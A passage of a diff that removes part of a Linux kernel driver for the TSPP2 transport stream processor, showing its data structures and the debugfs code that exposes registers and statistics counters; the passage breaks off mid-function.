-- *
-- * @batch_id:	Filter batch ID.
-- * @hw_filters:	An array of HW filters that belong to this batch. When set, this
-- *		indicates the filter is used. The actual HW index of a filter is
-- *		calculated according to the index in this array along with the
-- *		batch ID.
-- * @src:	Back-pointer to the source the batch is associated with. This is
-- *		also used to indicate this batch is "taken".
-- * @link:	A list element. When the batch is associated with a source, it
-- *		is added to the source's list of filter batches.
-- */
--struct tspp2_filter_batch {
--	u8 batch_id;
--	int hw_filters[TSPP2_FILTERS_PER_BATCH];
--	struct tspp2_src *src;
--	struct list_head link;
--};
--
--/**
-- * struct tspp2_src - Source object
-- *
-- * @opened:			A flag to indicate whether the source is open.
-- * @device:			Back-pointer to the TSPP2 device the source
-- *				belongs to.
-- * @hw_index:			The source's HW index. This is used when writing
-- *				to HW registers relevant for this source.
-- *				There are registers specific to TSIF or memory
-- *				sources, and there are registers common to all
-- *				sources.
-- * @input:			Source input type (TSIF / memory).
-- * @pkt_format:			Input packet size and format for this source.
-- * @scrambling_bits_monitoring:	Scrambling bits monitoring mode.
-- * @batches_list:		A list of associated filter batches.
-- * @filters_list:		A list of associated filters.
-- * @input_pipe:			A pointer to the source's input pipe, if exists.
-- * @output_pipe_list:		A list of output pipes attached to the source.
-- *				For each pipe we also save whether it is
-- *				stalling for this source.
-- * @num_associated_batches:	Number of associated filter batches.
-- * @num_associated_pipes:	Number of associated pipes.
-- * @num_associated_filters:	Number of associated filters.
-- * @reserved_filter_hw_index:	A HW filter index reserved for updating an
-- *				active filter's operations.
-- * @event_callback:		A user callback to invoke when a source event
-- *				occurs.
-- * @event_cookie:		A user cookie to provide to the callback.
-- * @event_bitmask:		A bit mask of source events
-- *				TSPP2_SRC_EVENT_XXX.
-- * @enabled:			A flag to indicate whether the source
-- *				is enabled.
-- */
--struct tspp2_src {
--	int opened;
--	struct tspp2_device *device;
--	u8 hw_index;
--	enum tspp2_src_input input;
--	enum tspp2_packet_format pkt_format;
--	enum tspp2_src_scrambling_monitoring scrambling_bits_monitoring;
--	struct list_head batches_list;
--	struct list_head filters_list;
--	struct tspp2_pipe *input_pipe;
--	struct list_head output_pipe_list;
--	u8 num_associated_batches;
--	u8 num_associated_pipes;
--	u32 num_associated_filters;
--	u16 reserved_filter_hw_index;
--	void (*event_callback)(void *cookie, u32 event_bitmask);
--	void *event_cookie;
--	u32 event_bitmask;
--	int enabled;
--};
--
--/**
-- * struct tspp2_global_irq_stats - Global interrupt statistics counters
-- *
-- * @tsp_invalid_af_control:	Invalid adaptation field control bit.
-- * @tsp_invalid_length:		Invalid adaptation field length.
-- * @pes_no_sync:		PES sync sequence not found.
-- * @encrypt_level_err:		Cipher operation configuration error.
-- */
--struct tspp2_global_irq_stats {
--	u32 tsp_invalid_af_control;
--	u32 tsp_invalid_length;
--	u32 pes_no_sync;
--	u32 encrypt_level_err;
--};
--
--/**
-- * struct tspp2_src_irq_stats - Memory source interrupt statistics counters
-- *
-- * @read_failure:	Failure to read from memory input.
-- * @flow_control_stall:	Input is stalled due to flow control.
-- */
--struct tspp2_src_irq_stats {
--	u32 read_failure;
--	u32 flow_control_stall;
--};
--
--/**
-- * struct tspp2_keytable_irq_stats - Key table interrupt statistics counters
-- *
-- * @key_not_ready:	Ciphering keys are not ready in the key table.
-- */
--struct tspp2_keytable_irq_stats {
--	u32 key_not_ready;
--};
--
--/**
-- * struct tspp2_pipe_irq_stats - Pipe interrupt statistics counters
-- *
-- * @unexpected_reset:		SW reset the pipe before all operations on this
-- *				pipe ended.
-- * @qsb_response_error:		TX operation ends with QSB error.
-- * @wrong_pipe_direction:	Trying to use a pipe in the wrong direction.
-- */
--struct tspp2_pipe_irq_stats {
--	u32 unexpected_reset;
--	u32 qsb_response_error;
--	u32 wrong_pipe_direction;
--};
--
--/**
-- * struct tspp2_filter_context_irq_stats - Filter interrupt statistics counters
-- *
-- * @sc_go_high:	Scrambling bits change from clear to encrypted.
-- * @sc_go_low:	Scrambling bits change from encrypted to clear.
-- */
--struct tspp2_filter_context_irq_stats {
--	u32 sc_go_high;
--	u32 sc_go_low;
--};
--
--/**
-- * struct tspp2_irq_stats - Interrupt statistics counters
-- *
-- * @global:	Global interrupt statistics counters
-- * @src:	Memory source interrupt statistics counters
-- * @kt:		Key table interrupt statistics counters
-- * @pipe:	Pipe interrupt statistics counters
-- * @ctx:	Filter context interrupt statistics counters
-- */
--struct tspp2_irq_stats {
--	struct tspp2_global_irq_stats global;
--	struct tspp2_src_irq_stats src[TSPP2_NUM_MEM_INPUTS];
--	struct tspp2_keytable_irq_stats kt[TSPP2_NUM_KEYTABLES];
--	struct tspp2_pipe_irq_stats pipe[TSPP2_NUM_PIPES];
--	struct tspp2_filter_context_irq_stats ctx[TSPP2_NUM_CONTEXTS];
--};
--
--/**
-- * struct tspp2_iommu_info - TSPP2 IOMMU information
-- *
-- * @hlos_group:		TSPP2 IOMMU HLOS (Non-Secure) group.
-- * @cpz_group:		TSPP2 IOMMU HLOS (Secure) group.
-- * @hlos_domain:	TSPP2 IOMMU HLOS (Non-Secure) domain.
-- * @cpz_domain:		TSPP2 IOMMU CPZ (Secure) domain.
-- * @hlos_domain_num:	TSPP2 IOMMU HLOS (Non-Secure) domain number.
-- * @cpz_domain_num:	TSPP2 IOMMU CPZ (Secure) domain number.
-- * @hlos_partition:	TSPP2 IOMMU HLOS partition number.
-- * @cpz_partition:	TSPP2 IOMMU CPZ partition number.
-- */
--struct tspp2_iommu_info {
--	struct iommu_group *hlos_group;
--	struct iommu_group *cpz_group;
--	struct iommu_domain *hlos_domain;
--	struct iommu_domain *cpz_domain;
--	int hlos_domain_num;
--	int cpz_domain_num;
--	int hlos_partition;
--	int cpz_partition;
--};
--
--/**
-- * struct tspp2_device - TSPP2 device
-- *
-- * @dev_id:			TSPP2 device ID.
-- * @opened:			A flag to indicate whether the device is open.
-- * @pdev:			Platform device.
-- * @dev:			Device structure, used for driver prints.
-- * @base:			TSPP2 Device memory base address.
-- * @tspp2_irq:			TSPP2 Device IRQ number.
-- * @bam_handle:			BAM handle.
-- * @bam_irq:			BAM IRQ number.
-- * @bam_props:			BAM properties.
-- * @iommu_info:			IOMMU information.
-- * @wakeup_src:			A wakeup source to keep CPU awake when needed.
-- * @spinlock:			A spinlock to protect accesses to
-- *				data structures that happen from APIs and ISRs.
-- * @mutex:			A mutex for mutual exclusion between API calls.
-- * @tsif_devices:		An array of TSIF devices.
-- * @gdsc:			GDSC power regulator.
-- * @bus_client:			Client for bus bandwidth voting.
-- * @tspp2_ahb_clk:		TSPP2 AHB clock.
-- * @tspp2_core_clk:		TSPP2 core clock.
-- * @tspp2_vbif_clk:		TSPP2 VBIF clock.
-- * @vbif_ahb_clk:               VBIF AHB clock.
-- * @vbif_axi_clk:               VBIF AXI clock.
-- * @tspp2_klm_ahb_clk:		TSPP2 KLM AHB clock.
-- * @tsif_ref_clk:		TSIF reference clock.
-- * @batches:			An array of filter batch objects.
-- * @contexts:			An array of context indexes. The index in this
-- *				array represents the context's HW index, while
-- *				the value represents whether it is used by a
-- *				filter or free.
-- * @indexing_tables:		An array of indexing tables.
-- * @tsif_sources:		An array of source objects for TSIF input.
-- * @mem_sources:		An array of source objects for memory input.
-- * @filters:			An array of filter objects.
-- * @pipes:			An array of pipe objects.
-- * @num_secured_opened_pipes:	Number of secured opened pipes.
-- * @num_non_secured_opened_pipes:	Number of non-secured opened pipes.
-- * @num_enabled_sources:	Number of enabled sources.
-- * @work_queue:			A work queue for invoking user callbacks.
-- * @event_callback:		A user callback to invoke when a global event
-- *				occurs.
-- * @event_cookie:		A user cookie to provide to the callback.
-- * @event_bitmask:		A bit mask of global events
-- *				TSPP2_GLOBAL_EVENT_XXX.
-- * @debugfs_entry:		TSPP2 device debugfs entry.
-- * @irq_stats:			TSPP2 IRQ statistics.
-- * @free_work_list:		A list of available work elements.
-- * @work_pool:			A pool of work elements.
-- */
--struct tspp2_device {
--	u32 dev_id;
--	int opened;
--	struct platform_device *pdev;
--	struct device *dev;
--	void __iomem *base;
--	u32 tspp2_irq;
--	unsigned long bam_handle;
--	u32 bam_irq;
--	struct sps_bam_props bam_props;
--	struct tspp2_iommu_info iommu_info;
--	struct wakeup_source wakeup_src;
--	spinlock_t spinlock;
--	struct mutex mutex;
--	struct tspp2_tsif_device tsif_devices[TSPP2_NUM_TSIF_INPUTS];
--	struct regulator *gdsc;
--	uint32_t bus_client;
--	struct clk *tspp2_ahb_clk;
--	struct clk *tspp2_core_clk;
--	struct clk *tspp2_vbif_clk;
--	struct clk *vbif_ahb_clk;
--	struct clk *vbif_axi_clk;
--	struct clk *tspp2_klm_ahb_clk;
--	struct clk *tsif_ref_clk;
--	struct tspp2_filter_batch batches[TSPP2_NUM_BATCHES];
--	int contexts[TSPP2_NUM_AVAIL_CONTEXTS];
--	struct tspp2_indexing_table indexing_tables[TSPP2_NUM_INDEXING_TABLES];
--	struct tspp2_src tsif_sources[TSPP2_NUM_TSIF_INPUTS];
--	struct tspp2_src mem_sources[TSPP2_NUM_MEM_INPUTS];
--	struct tspp2_filter filters[TSPP2_NUM_AVAIL_FILTERS];
--	struct tspp2_pipe pipes[TSPP2_NUM_PIPES];
--	u8 num_secured_opened_pipes;
--	u8 num_non_secured_opened_pipes;
--	u8 num_enabled_sources;
--	struct workqueue_struct *work_queue;
--	void (*event_callback)(void *cookie, u32 event_bitmask);
--	void *event_cookie;
--	u32 event_bitmask;
--	struct dentry *debugfs_entry;
--	struct tspp2_irq_stats irq_stats;
--	struct list_head free_work_list;
--	struct tspp2_event_work work_pool[TSPP2_NUM_EVENT_WORK_ELEMENTS];
--};
--
--/* Global TSPP2 devices database */
--static struct tspp2_device *tspp2_devices[TSPP2_NUM_DEVICES];
--
--/* debugfs support */
--
--static int debugfs_iomem_x32_set(void *data, u64 val)
--{
--	int ret;
--	struct tspp2_device *device = tspp2_devices[0]; /* Assuming device 0 */
--
--	if (!device->opened)
--		return -ENODEV;
--
--	ret = pm_runtime_get_sync(device->dev);
--	if (ret < 0)
--		return ret;
--
--	writel_relaxed(val, data);
--	wmb();
--
--	pm_runtime_mark_last_busy(device->dev);
--	pm_runtime_put_autosuspend(device->dev);
--
--	return 0;
--}
--
--static int debugfs_iomem_x32_get(void *data, u64 *val)
--{
--	int ret;
--	struct tspp2_device *device = tspp2_devices[0]; /* Assuming device 0 */
--
--	if (!device->opened)
--		return -ENODEV;
--
--	ret = pm_runtime_get_sync(device->dev);
--	if (ret < 0)
--		return ret;
--
--	*val = readl_relaxed(data);
--
--	pm_runtime_mark_last_busy(device->dev);
--	pm_runtime_put_autosuspend(device->dev);
--
--	return 0;
--}
--
--DEFINE_SIMPLE_ATTRIBUTE(fops_iomem_x32, debugfs_iomem_x32_get,
--			debugfs_iomem_x32_set, "0x%08llX");
--
--static int debugfs_dev_open_set(void *data, u64 val)
--{
--	int ret = 0;
--
--	/* Assuming device 0 */
--	if (val == 1)
--		ret = tspp2_device_open(0);
--	else
--		ret = tspp2_device_close(0);
--
--	return ret;
--}
--
--static int debugfs_dev_open_get(void *data, u64 *val)
--{
--	struct tspp2_device *device = tspp2_devices[0]; /* Assuming device 0 */
--
--	*val = device->opened;
--
--	return 0;
--}
--
--DEFINE_SIMPLE_ATTRIBUTE(fops_device_open, debugfs_dev_open_get,
--			debugfs_dev_open_set, "0x%08llX");
--
--/**
-- * tspp2_tsif_debugfs_init() - TSIF device debugfs initialization.
-- *
-- * @tsif_device:	TSIF device.
-- */
--static void tspp2_tsif_debugfs_init(struct tspp2_tsif_device *tsif_device)
--{
--	int i;
--	char name[10];
--	struct dentry *dentry;
--	void __iomem *base = tsif_device->base;
--
--	snprintf(name, 10, "tsif%i", tsif_device->hw_index);
--	tsif_device->debugfs_entry = debugfs_create_dir(name, NULL);
--
--	if (!tsif_device->debugfs_entry)
--		return;
--
--	dentry = tsif_device->debugfs_entry;
--	if (dentry) {
--		for (i = 0; i < ARRAY_SIZE(tsif_regs); i++) {
--			debugfs_create_file(
--				tsif_regs[i].name,
--				tsif_regs[i].mode,
--				dentry,
--				base + tsif_regs[i].offset,
--				&fops_iomem_x32);
--		}
--	}
--
--	dentry = debugfs_create_dir("statistics", tsif_device->debugfs_entry);
--	if (dentry) {
--		debugfs_create_u32(
--			"stat_pkt_write_err",
--			S_IRUGO | S_IWUSR | S_IWGRP,
--			dentry,
--			&tsif_device->stat_pkt_write_err);
--
--		debugfs_create_u32(
--			"stat_pkt_read_err",
--			S_IRUGO | S_IWUSR | S_IWGRP,
--			dentry,
--			&tsif_device->stat_pkt_read_err);
--
--		debugfs_create_u32(
--			"stat_overflow",
--			S_IRUGO | S_IWUSR | S_IWGRP,
--			dentry,
--			&tsif_device->stat_overflow);
--
--		debugfs_create_u32(
--			"stat_lost_sync",
--			S_IRUGO | S_IWUSR | S_IWGRP,
--			dentry,
--			&tsif_device->stat_lost_sync);
--
--		debugfs_create_u32(
--			"stat_timeout",
--			S_IRUGO | S_IWUSR | S_IWGRP,
--			dentry,
--			&tsif_device->stat_timeout);
--	}
--}
--
--static char *op_to_string(enum tspp2_operation_type op)
--{
--	switch (op) {
--	case TSPP2_OP_PES_ANALYSIS:
--		return "TSPP2_OP_PES_ANALYSIS";
--	case TSPP2_OP_RAW_TRANSMIT:
--		return "TSPP2_OP_RAW_TRANSMIT";
--	case TSPP2_OP_PES_TRANSMIT:
--		return "TSPP2_OP_PES_TRANSMIT";
--	case TSPP2_OP_PCR_EXTRACTION:
--		return "TSPP2_OP_PCR_EXTRACTION";
--	case TSPP2_OP_CIPHER:
--		return "TSPP2_OP_CIPHER";
--	case TSPP2_OP_INDEXING:
--		return "TSPP2_OP_INDEXING";
--	case TSPP2_OP_COPY_PACKET:
--		return "TSPP2_OP_COPY_PACKET";
--	default:
--		return "Invalid Operation";
--	}
--}
--
--static char *src_input_to_string(enum tspp2_src_input src_input)
--{
--	switch (src_input) {
--	case TSPP2_INPUT_TSIF0:
--		return "TSPP2_INPUT_TSIF0";
--	case TSPP2_INPUT_TSIF1:
--		return "TSPP2_INPUT_TSIF1";
--	case TSPP2_INPUT_MEMORY:
--		return "TSPP2_INPUT_MEMORY";
--	default:
--		return "Unknown source input type";
--	}
--}
--
--static char *pkt_format_to_string(enum tspp2_packet_format pkt_format)
--{
--	switch (pkt_format) {
--	case TSPP2_PACKET_FORMAT_188_RAW:
--		return "TSPP2_PACKET_FORMAT_188_RAW";
--	case TSPP2_PACKET_FORMAT_192_HEAD:
--		return "TSPP2_PACKET_FORMAT_192_HEAD";
--	case TSPP2_PACKET_FORMAT_192_TAIL:
--		return "TSPP2_PACKET_FORMAT_192_TAIL";
--	default:
--		return "Unknown packet format";
--	}
--}
--
--/**
-- * debugfs service to print device information.
-- */
--static int tspp2_device_debugfs_print(struct seq_file *s, void *p)
--{
--	int count;
--	int exist_flag = 0;
--	struct tspp2_device *device = (struct tspp2_device *)s->private;
--
--	seq_printf(s, "dev_id: %d\n", device->dev_id);
--	seq_puts(s, "Enabled filters:");
--	for (count = 0; count < TSPP2_NUM_AVAIL_FILTERS; count++)
--		if (device->filters[count].enabled) {
--			seq_printf(s, "\n\tfilter%3d", count);
--			exist_flag = 1;
--		}
--	if (!exist_flag)
--		seq_puts(s, " none\n");
--	else
--		seq_puts(s, "\n");
--
--	exist_flag = 0;
--	seq_puts(s, "Opened filters:");
--	for (count = 0; count < TSPP2_NUM_AVAIL_FILTERS; count++)
--		if (device->filters[count].opened) {
--			seq_printf(s, "\n\tfilter%3d", count);
--			exist_flag = 1;
--		}
--	if (!exist_flag)
--		seq_puts(s, " none\n");
--	else
--		seq_puts(s, "\n");
--
--	exist_flag = 0;
--	seq_puts(s, "Opened pipes:\n");
--	for (count = 0; count < TSPP2_NUM_PIPES; count++)
--		if (device->pipes[count].opened) {
--			seq_printf(s, "\tpipe%2d\n", count);
--			exist_flag = 1;
--		}
--	if (!exist_flag)
--		seq_puts(s, " none\n");
--	else
--		seq_puts(s, "\n");
--
--	return 0;
--}
--
--/**
-- * debugfs service to print source information.
-- */
--static int tspp2_src_debugfs_print(struct seq_file *s, void *p)
--{
--	struct tspp2_filter_batch *batch;
--	struct tspp2_filter *filter;
--	struct tspp2_output_pipe *output_pipe;
--	struct tspp2_src *src = (struct tspp2_src *)s->private;
--
--	if (!src) {
--		seq_puts(s, "error\n");
--		return 1;
--	}
--	seq_printf(s, "Status: %s\n", src->enabled ? "enabled" : "disabled");
--	seq_printf(s, "hw_index: %d\n", src->hw_index);
--	seq_printf(s, "event_bitmask: 0x%08X\n", src->event_bitmask);
--	if (src->input_pipe)
--		seq_printf(s, "input_pipe hw_index: %d\n",
--				src->input_pipe->hw_index);
--	seq_printf(s, "tspp2_src_input: %s\n", src_input_to_string(src->input));
--	seq_printf(s, "pkt_format: %s\n",
--			pkt_format_to_string(src->pkt_format));
--	seq_printf(s, "num_associated_batches: %d\n",
--			src->num_associated_batches);
--
--	if (src->num_associated_batches) {
--		seq_puts(s, "batch_ids: ");
--		list_for_each_entry(batch, &src->batches_list, link)
--			seq_printf(s, "%d  ", batch->batch_id);
--		seq_puts(s, "\n");
--	}
--
--	seq_printf(s, "num_associated_pipes: %d\n", src->num_associated_pipes);
--	if (src->num_associated_pipes) {
--		seq_puts(s, "pipes_hw_idxs: ");
--		list_for_each_entry(output_pipe, &src->output_pipe_list, link) {
--			seq_printf(s, "%d  ", output_pipe->pipe->hw_index);
--		}
--		seq_puts(s, "\n");
--	}
--
--	seq_printf(s, "reserved_filter_hw_index: %d\n",
--			src->reserved_filter_hw_index);
--
--	seq_printf(s, "num_associated_filters: %d\n",
--			src->num_associated_filters);
--	if (src->num_associated_filters) {
--		int i;
--		seq_puts(s, "Open filters:\n");
--		list_for_each_entry(filter, &src->filters_list, link) {
--			if (!filter->opened)
--				continue;
--			seq_printf(s, "\thw_index: %d\n",
--					filter->hw_index);
--			seq_printf(s, "\tStatus: %s\n",
--					filter->enabled ? "enabled"
--							: "disabled");
--			seq_printf(s, "\tpid_value: 0x%08X\n",
--					filter->pid_value);
--			seq_printf(s, "\tmask: 0x%08X\n", filter->mask);
--			seq_printf(s, "\tnum_user_operations: %d\n",
--					filter->num_user_operations);
--			if (filter->num_user_operations) {
--				seq_puts(
--					s, "\tTypes of operations:\n");
--				for (i = 0;
--					i < filter->num_user_operations; i++) {
--					seq_printf(s, "\t\t%s\n", op_to_string(
--						filter->operations[i].type));
--				}
--			}
--		}
--
--	} else {
--		seq_puts(s, "no filters\n");
--	}
--
--	return 0;
--}
--
--/**
-- * debugfs service to print filter information.
-- */
--static int filter_debugfs_print(struct seq_file *s, void *p)
--{
--	int i;
--	struct tspp2_filter *filter = (struct tspp2_filter *)s->private;
--
--	seq_printf(s, "Status: %s\n", filter->opened ? "opened" : "closed");
--	if (filter->batch)
--		seq_printf(s, "Located in batch %d\n", filter->batch->batch_id);
--	if (filter->src)
--		seq_printf(s, "Associated with src %d\n",
--				filter->src->hw_index);
--	seq_printf(s, "hw_index: %d\n", filter->hw_index);
--	seq_printf(s, "pid_value: 0x%08X\n", filter->pid_value);
--	seq_printf(s, "mask: 0x%08X\n", filter->mask);
--	seq_printf(s, "context: %d\n", filter->context);
--	seq_printf(s, "indexing_table_id: %d\n", filter->indexing_table_id);
--	seq_printf(s, "num_user_operations: %d\n", filter->num_user_operations);
--	seq_puts(s, "Types of operations:\n");
--	for (i = 0; i < filter->num_user_operations; i++)
--		seq_printf(s, "\t%s\n", op_to_string(
--				filter->operations[i].type));
--	seq_printf(s, "indexing_op_set: %d\n", filter->indexing_op_set);
--	seq_printf(s, "raw_op_with_indexing: %d\n",
--			filter->raw_op_with_indexing);
--	seq_printf(s, "pes_analysis_op_set: %d\n", filter->pes_analysis_op_set);
--	seq_printf(s, "raw_op_set: %d\n", filter->raw_op_set);
--	seq_printf(s, "pes_tx_op_set: %d\n", filter->pes_tx_op_set);
--	seq_printf(s, "Status: %s\n", filter->enabled ? "enabled" : "disabled");
--
--	if (filter->enabled) {
--		seq_printf(s, "Filter context-based counters, context %d\n",
--				filter->context);
--		seq_printf(s, "filter_tsp_sync_err = 0x%08X\n",
--			readl_relaxed(filter->device->base +
--			TSPP2_FILTER_TSP_SYNC_ERROR(filter->context)));
--		seq_printf(s, "filter_erred_tsp = 0x%08X\n",
--			readl_relaxed(filter->device->base +
--			TSPP2_FILTER_ERRED_TSP(filter->context)));
--		seq_printf(s, "filter_discontinuities = 0x%08X\n",
--			readl_relaxed(filter->device->base +
--			TSPP2_FILTER_DISCONTINUITIES(filter->context)));
--		seq_printf(s, "filter_sc_bits_discard = 0x%08X\n",
--			readl_relaxed(filter->device->base +
--			TSPP2_FILTER_SCRAMBLING_BITS_DISCARD(filter->context)));
--		seq_printf(s, "filter_tsp_total_num = 0x%08X\n",
--			readl_relaxed(filter->device->base +
--			TSPP2_FILTER_TSP_TOTAL_NUM(filter->context)));
--		seq_printf(s, "filter_discont_indicator = 0x%08X\n",
--			readl_relaxed(filter->device->base +
--			TSPP2_FILTER_DISCONT_INDICATOR(filter->context)));
--		seq_printf(s, "filter_tsp_no_payload = 0x%08X\n",
--			readl_relaxed(filter->device->base +
--			TSPP2_FILTER_TSP_NO_PAYLOAD(filter->context)));
--		seq_printf(s, "filter_tsp_duplicate = 0x%08X\n",
--			readl_relaxed(filter->device->base +
--			TSPP2_FILTER_TSP_DUPLICATE(filter->context)));
--		seq_printf(s, "filter_key_fetch_fail = 0x%08X\n",
--			readl_relaxed(filter->device->base +
--			TSPP2_FILTER_KEY_FETCH_FAILURE(filter->context)));
--		seq_printf(s, "filter_dropped_pcr = 0x%08X\n",
--			readl_relaxed(filter->device->base +
--			TSPP2_FILTER_DROPPED_PCR(filter->context)));
--		seq_printf(s, "filter_pes_errors = 0x%08X\n",
--			readl_relaxed(filter->device->base +
--			TSPP2_FILTER_PES_ERRORS(filter->context)));
--	}
--
--	return 0;
--}
--
--/**
-- * debugfs service to print pipe information.
-- */
--static int pipe_debugfs_print(struct seq_file *s, void *p)
--{
--	struct tspp2_pipe *pipe = (struct tspp2_pipe *)s->private;
--	seq_printf(s, "hw_index: %d\n", pipe->hw_index);
--	seq_printf(s, "iova: 0x%08X\n", pipe->iova);
--	seq_printf(s, "threshold: %d\n", pipe->threshold);
--	seq_printf(s, "Status: %s\n", pipe->opened ? "opened" : "closed");
--	seq_printf(s, "ref_cnt: %d\n", pipe->ref_cnt);
--	return 0;
--}
--
--static int tspp2_dev_dbgfs_open(struct inode *inode, struct file *file)
--{
--	return single_open(file, tspp2_device_debugfs_print,
--			inode->i_private);
--}
--
--static int tspp2_filter_dbgfs_open(struct inode *inode, struct file *file)
--{
--	return single_open(file, filter_debugfs_print, inode->i_private);
--}
--
--static int tspp2_pipe_dbgfs_open(struct inode *inode, struct file *file)
--{
--	return single_open(file, pipe_debugfs_print, inode->i_private);
--}
--
--static int tspp2_src_dbgfs_open(struct inode *inode, struct file *file)
--{
--	return single_open(file, tspp2_src_debugfs_print, inode->i_private);
--}
--
--static const struct file_operations dbgfs_tspp2_device_fops = {
--	.open = tspp2_dev_dbgfs_open,
--	.read = seq_read,
--	.llseek = seq_lseek,
--	.release = single_release,
--	.owner = THIS_MODULE,
--};
--
--static const struct file_operations dbgfs_filter_fops = {
--	.open = tspp2_filter_dbgfs_open,
--	.read = seq_read,
--	.llseek = seq_lseek,
--	.release = single_release,
--	.owner = THIS_MODULE,
--};
--
--static const struct file_operations dbgfs_pipe_fops = {
--	.open = tspp2_pipe_dbgfs_open,
--	.read = seq_read,
--	.llseek = seq_lseek,
--	.release = single_release,
--	.owner = THIS_MODULE,
--};
--
--static const struct file_operations dbgfs_src_fops = {
--	.open = tspp2_src_dbgfs_open,
--	.read = seq_read,
--	.llseek = seq_lseek,
--	.release = single_release,
--	.owner = THIS_MODULE,
--};
--
--/**
-- * tspp2_tsif_debugfs_exit() - TSIF device debugfs teardown.
-- *
-- * @tsif_device:	TSIF device.
-- */
--static void tspp2_tsif_debugfs_exit(struct tspp2_tsif_device *tsif_device)
--{
--	debugfs_remove_recursive(tsif_device->debugfs_entry);
--	tsif_device->debugfs_entry = NULL;
--}
--
--/**
-- * tspp2_debugfs_init() - TSPP2 device debugfs initialization.
-- *
-- * @device:	TSPP2 device.
-- */
--static void tspp2_debugfs_init(struct tspp2_device *device)
--{
--	int i, j;
--	char name[80];
--	struct dentry *dentry;
--	struct dentry *dir;
--	void __iomem *base = device->base;
--
--	snprintf(name, 80, "tspp2_%i", device->dev_id);
--	device->debugfs_entry = debugfs_create_dir(name, NULL);
--
--	if (!device->debugfs_entry)
--		return;
--
--	/* Support device open/close */
--	debugfs_create_file("open", TSPP2_S_RW, device->debugfs_entry,
--				NULL, &fops_device_open);
--
--	dentry = debugfs_create_dir("regs", device->debugfs_entry);
--	if (dentry) {
--		for (i = 0; i < ARRAY_SIZE(tspp2_regs); i++) {
--			debugfs_create_file(
--				tspp2_regs[i].name,
--				tspp2_regs[i].mode,
--				dentry,
--				base + tspp2_regs[i].offset,
--				&fops_iomem_x32);
--		}
--	}
--
--	dentry = debugfs_create_dir("statistics", device->debugfs_entry);
--	if (dentry) {
--		debugfs_create_u32(
--			"stat_tsp_invalid_af_control",
--			S_IRUGO | S_IWUSR | S_IWGRP,
--			dentry,
--			&device->irq_stats.global.tsp_invalid_af_control);
--
--		debugfs_create_u32(
--			"stat_tsp_invalid_length",
--			S_IRUGO | S_IWUSR | S_IWGRP,
--			dentry,
--			&device->irq_stats.global.tsp_invalid_length);
--
--		debugfs_create_u32(
--			"stat_pes_no_sync",
--			S_IRUGO | S_IWUSR | S_IWGRP,
--			dentry,
--			&device->irq_stats.global.pes_no_sync);
--
--		debugfs_create_u32(
--			"stat_encrypt_level_err",
--			S_IRUGO | S_IWUSR | S_IWGRP,
--			dentry,
--			&device->irq_stats.global.encrypt_level_err);
--	}
--
--	dir = debugfs_create_dir("counters", device->debugfs_entry);
--	for (i = 0; i < TSPP2_NUM_CONTEXTS; i++) {
--		snprintf(name, 80, "context%03i", i);
--		dentry = debugfs_create_dir(name, dir);
--		if (dentry) {
--			debugfs_create_file("filter_tsp_sync_err",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_FILTER_TSP_SYNC_ERROR(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("filter_erred_tsp",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_FILTER_ERRED_TSP(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("filter_discontinuities",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_FILTER_DISCONTINUITIES(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("filter_sc_bits_discard",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_FILTER_SCRAMBLING_BITS_DISCARD(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("filter_tsp_total_num",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_FILTER_TSP_TOTAL_NUM(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("filter_discont_indicator",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_FILTER_DISCONT_INDICATOR(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("filter_tsp_no_payload",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_FILTER_TSP_NO_PAYLOAD(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("filter_tsp_duplicate",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_FILTER_TSP_DUPLICATE(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("filter_key_fetch_fail",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_FILTER_KEY_FETCH_FAILURE(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("filter_dropped_pcr",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_FILTER_DROPPED_PCR(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("filter_pes_errors",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_FILTER_PES_ERRORS(i),
--				&fops_iomem_x32);
--
--			debugfs_create_u32(
--				"stat_sc_go_high",
--				S_IRUGO | S_IWUSR | S_IWGRP,
--				dentry,
--				&device->irq_stats.ctx[i].sc_go_high);
--
--			debugfs_create_u32(
--				"stat_sc_go_low",
--				S_IRUGO | S_IWUSR | S_IWGRP,
--				dentry,
--				&device->irq_stats.ctx[i].sc_go_low);
--		}
--	}
--
--	dir = debugfs_create_dir("filters", device->debugfs_entry);
--	for (i = 0; i < TSPP2_NUM_HW_FILTERS; i++) {
--		snprintf(name, 80, "filter%03i", i);
--		dentry = debugfs_create_dir(name, dir);
--		if (dentry) {
--			debugfs_create_file("filter_entry0",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_FILTER_ENTRY0(i),
--				&fops_iomem_x32);
--
--			debugfs_create_file("filter_entry1",
--				TSPP2_S_RW,
--				dentry,
--				base + TSPP2_FILTER_ENTRY1(i),
--				&fops_iomem_x32);
--
--			for (j = 0; j < TSPP2_MAX_OPS_PER_FILTER; j++) {
--				snprintf(name, 80, "opcode%02i", j);
--				debugfs_create_file(name,
--					TSPP2_S_RW,
--					dentry,
--					base + TSPP2_OPCODE(i, j),
--					&fops_iomem_x32);
--			}
--		}
--	}
--
--	dir = debugfs_create_dir("mem_sources", device->debugfs_entry);
--	for (i = 0; i < TSPP2_NUM_MEM_INPUTS; i++) {
--		snprintf(name, 80, "mem_src%i", i);
--		dentry = debugfs_create_dir(name, dir);
--		if (dentry) {
--			debugfs_create_u32(
--				"stat_read_failure",
--				S_IRUGO | S_IWUSR | S_IWGRP,
--				dentry,
--				&device->irq_stats.src[i].read_failure);
--
--			debugfs_create_u32(
--				"stat_flow_control_stall",
